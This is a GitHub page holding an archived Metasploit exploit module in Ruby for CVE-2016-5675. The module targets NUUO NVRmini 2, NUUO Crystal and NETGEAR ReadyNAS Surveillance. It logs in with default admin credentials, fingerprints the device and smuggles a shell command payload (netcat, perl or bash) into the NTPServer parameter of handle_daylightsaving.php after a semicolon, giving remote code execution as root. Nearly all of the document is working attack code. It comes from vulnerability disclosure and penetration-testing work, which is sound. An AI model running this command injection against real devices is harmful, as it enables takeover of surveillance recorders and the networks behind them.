-
Notifications
You must be signed in to change notification settings - Fork 167
/
nuuo_nvrmini_auth_rce.rb
180 lines (168 loc) · 6.43 KB
/
nuuo_nvrmini_auth_rce.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# NOTE !!!
# This exploit is kept here for archiving purposes only.
# Please refer to and use the version that has been accepted into the Metasploit framework.
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'NUUO NVRmini 2 / Crystal / NETGEAR ReadyNAS Surveillance Authenticated Remote Code Execution',
'Description' => %q{
The NVRmini 2 Network Video Recorder, Crystal NVR and the ReadyNAS Surveillance application are vulnerable
to an authenticated remote code execution on the exposed web administration interface. An administrative
account is needed to exploit this vulnerability.
This results in code execution as root in the NVRmini and the 'admin' user in ReadyNAS.
This exploit has been tested on several versions of the NVRmini 2, Crystal and the ReadyNAS Surveillance.
It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested
in those devices.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2016-5675'],
['US-CERT-VU', '856152'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-nvr-vulns.txt'],
['URL', 'http://seclists.org/fulldisclosure/2016/Aug/36']
],
'DefaultOptions' => { 'WfsDelay' => 5 },
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => false, # Runs as root in NVRmini 2 / Crystal, admin in ReadyNas
'Targets' =>
[
[ 'Automatic', { } ],
[ 'NUUO NVRmini 2', {
'Payload' =>
{
'Space' => 1024, # Actually it might be the GET request length, but this is a safe value
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'netcat generic perl'
}
},
}],
[ 'ReadyNAS NETGEAR Surveillance', {
'Payload' =>
{
'Space' => 1024, # Actually it might be the GET request length, but this is a safe value
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'netcat generic perl'
}
},
}],
[ 'NUUO Crystal', {
'Payload' =>
{
'Space' => 1024, # Actually it might be the GET request length, but this is a safe value
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'bash'
}
},
}],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 4 2016'))
register_options(
[
Opt::RPORT(8081),
OptString.new('TARGETURI', [true, "Application path", '/']),
OptString.new('USERNAME', [true, 'The username to login as', 'admin']),
OptString.new('PASSWORD', [true, 'Password for the specified username', 'admin']),
], self.class)
end
def id_target
return target if target.name != 'Automatic'
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'])
})
if res && res.code == 200
if res.body.to_s =~ /var VENDOR_NAME = "Netgear";/
print_status("#{peer} - Identified NETGEAR ReadyNAS Surveillance as the target.")
return targets[2]
elsif res.body.to_s =~ /v_web_login_login_type/
print_status("#{peer} - Identified NUUO Crystal as the target.")
return targets[3]
else
print_status("#{peer} - Identified NUUO NVRMini 2 as the target.")
return targets[1]
end
end
end
def exploit
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(datastore['TARGETURI'], "login.php"),
'vars_post' => {
'user' => datastore['USERNAME'],
'pass' => datastore['PASSWORD'],
'submit' => "Login"
}
})
if res && (res.code == 200 || res.code == 302)
cookie = res.get_cookies
else
fail_with(Failure::Unknown, "#{peer} - Failed to log in with the provided credentials.")
end
my_target = id_target
if my_target == targets[1]
if payload.raw.include?("perl")
fail_with(Failure::Unknown, "The NVRmini 2 only supports generic or netcat payloads.")
end
print_status("#{peer} - Executing payload...")
send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], "handle_daylightsaving.php"),
'cookie' => cookie,
'vars_get' => {
'act' => "update",
'NTPServer' => rand_text_alpha(12 + rand(8)) + ";" + payload.encoded
}
}, 1)
elsif my_target == targets[2]
if payload.raw.include?("netcat")
fail_with(Failure::Unknown, "ReadyNAS Surveillance does not support netcat payloads.")
end
# We also have to fix the perl payload - there's an IO import error on the ReadyNAS that blows
# it up.
print_status("#{peer} - Executing payload...")
send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], "handle_daylightsaving.php"),
'cookie' => cookie,
'vars_get' => {
'act' => "update",
'NTPServer' => rand_text_alpha(12 + rand(8)) + ";" + payload.raw.gsub("-MIO ", "-MIO::Socket ")
}
}, 1)
else
if not payload.raw.include?("exec")
fail_with(Failure::Unknown, "NUUO Crystal only supports bash payloads.")
end
print_status("#{peer} - Executing payload...")
send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], "handle_daylightsaving.php"),
'cookie' => cookie,
'vars_get' => {
'act' => "update",
'NTPServer' => rand_text_alpha(12 + rand(8)) + ";" + payload.raw
}
}, 1)
end
handler
end
end